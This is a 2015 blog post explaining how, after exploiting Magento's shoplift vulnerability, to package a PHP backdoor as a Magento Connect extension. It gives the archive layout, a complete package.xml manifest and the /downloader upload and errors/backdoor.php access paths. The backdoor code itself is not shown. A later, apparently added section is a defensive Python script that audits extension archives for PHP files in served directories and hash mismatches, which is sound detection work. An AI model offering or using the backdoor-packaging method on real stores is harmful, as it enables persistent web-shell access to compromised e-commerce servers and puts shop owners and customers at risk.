Title: Writing a simple extension/backdoor for Magento
Date: 2015-11-15 17:15

![shoplift logo]({static}/images/shoplift_logo.png)

I was exploiting the [shoplift vulnerability]( https://magento.com/security-patch )
on a [Magento]( https://magento.com/ ) instance, and I was looking for a practical (as in *easy* and *clean*)
way to get a shell. Of course, I could have chained
[CVE-2015-1398]( http://www.cvedetails.com/cve/CVE-2015-1398/ )
and [CVE-2015-1399]( http://www.cvedetails.com/cve/CVE-2015-1399/ ) like
[Checkpoint did]( http://blog.checkpoint.com/2015/04/20/analyzing-magento-vulnerability/ ),
but I was way too lazy.

Instead, I decided to write an [extension module]( http://www.magentocommerce.com/magento-connect/ )
and to install it. Since the internet is full of either outdated or way, way, way, way too complex tutorials
about how to write a **simple fucking extension with a single stupid php file**, here is a quick how-to:

I didn't want to read the URL-rewriting code of Magento, so I decided
that my backdoor would be under the `errors` folder.

Write (or get) a PHP backdoor and put it into an `errors` folder,
create a `package.xml` file like the one shown further down, and pack everything into a `tar.gz` archive laid out like this:

```bash
$ tree
.
├── errors
│   └── backdoor.php
└── package.xml
```

That's it: you have your module. You can now upload it at `http://yourmagentoinstan.ce/downloader`
and access your backdoor at `http://yourmagentoinstan.ce/errors/backdoor.php`.

```xml
<?xml version="1.0"?>
<package>
<name>backdoor</name>
<version>1.3.3.7</version>
<stability>devel</stability>
<licence>backdoor</licence>
<channel>community</channel>
<extends/>
<summary>Backdoor for magento</summary>
<description>Backdoor for magento</description>
<notes>backdoor</notes>
<authors>
	<author>
		<name>jvoisin</name>
		<user>jvoisin</user>
		<email>julien.voisin@dustri.org</email>
	</author>
</authors>
<date>2015-08-17</date>
<time>13:47:49</time>
<contents>
	<target name="mage">
		<dir>
			<dir name="errors">
				<file name="backdoor.php" hash="1296555a85143621a52b2573a5cae715"/>
			</dir>
		</dir>
	</target>
</contents>
<compatible/>
<dependencies>
	<required>
		<php>
			<min>5.2.0</min>
			<max>6.0.0</max>
		</php>
	</required>
</dependencies>
</package>
```

The `hash` attribute of each `<file>` element is the MD5 checksum (the `md5sum` output) of that file (here, `backdoor.php`).
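Seen from the defender's side, the same layout can be checked before a package is installed. The following is an added example, not code from the original post: it reads a Connect-style archive in memory, walks `package.xml`, and flags PHP files destined for directly served directories as well as MD5 mismatches. The function names, the `WEB_DIRS` entries other than `errors`, and the inert sample archive are assumptions made for illustration.

```python
import hashlib, io, posixpath, tarfile
import xml.etree.ElementTree as ET  # untrusted uploads: prefer defusedxml

# "errors" comes from the post; the other directories are assumptions.
WEB_DIRS = {"errors", "media", "skin", "js"}

def manifest_files(package_xml):
    """Yield (install_path, md5_hex) for each <file> under <contents>."""
    def walk(node, prefix):
        for child in node:
            if child.tag == "dir":
                name = child.get("name")
                yield from walk(child, prefix + [name] if name else prefix)
            elif child.tag == "file":
                path = "/".join(prefix + [child.get("name")])
                yield posixpath.normpath(path), child.get("hash")
    for target in ET.fromstring(package_xml).iterfind("./contents/target"):
        yield from walk(target, [])

def audit_package(tgz_bytes):
    """Return sorted (finding, path) tuples for one package archive."""
    with tarfile.open(fileobj=io.BytesIO(tgz_bytes), mode="r:gz") as tar:
        data = {posixpath.normpath(m.name): tar.extractfile(m).read()
                for m in tar.getmembers() if m.isfile()}
    if "package.xml" not in data:
        return [("no-manifest", "package.xml")]
    findings = set()
    for path, md5 in manifest_files(data["package.xml"]):
        if path.lower().endswith((".php", ".phtml")) and path.split("/")[0] in WEB_DIRS:
            findings.add(("script-in-web-dir", path))
        if path not in data:
            findings.add(("missing-from-archive", path))
        elif hashlib.md5(data[path]).hexdigest() != (md5 or "").lower():
            findings.add(("hash-mismatch", path))
    return sorted(findings)

def build_sample(declared_md5=None):
    """Constructed sample: an inert PHP placeholder shipped under errors/."""
    body = b"<?php /* constructed placeholder, does nothing */\n"
    md5 = declared_md5 or hashlib.md5(body).hexdigest()
    xml = ('<package><contents><target name="mage"><dir><dir name="errors">'
           '<file name="placeholder.php" hash="%s"/></dir></dir></target>'
           '</contents></package>' % md5).encode()
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, content in (("package.xml", xml), ("errors/placeholder.php", body)):
            info = tarfile.TarInfo(name)
            info.size = len(content)
            tar.addfile(info, io.BytesIO(content))
    return buf.getvalue()
```

The `hash` value is computed by whoever builds the package, so a match only shows the archive is internally consistent, not that its contents can be trusted.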
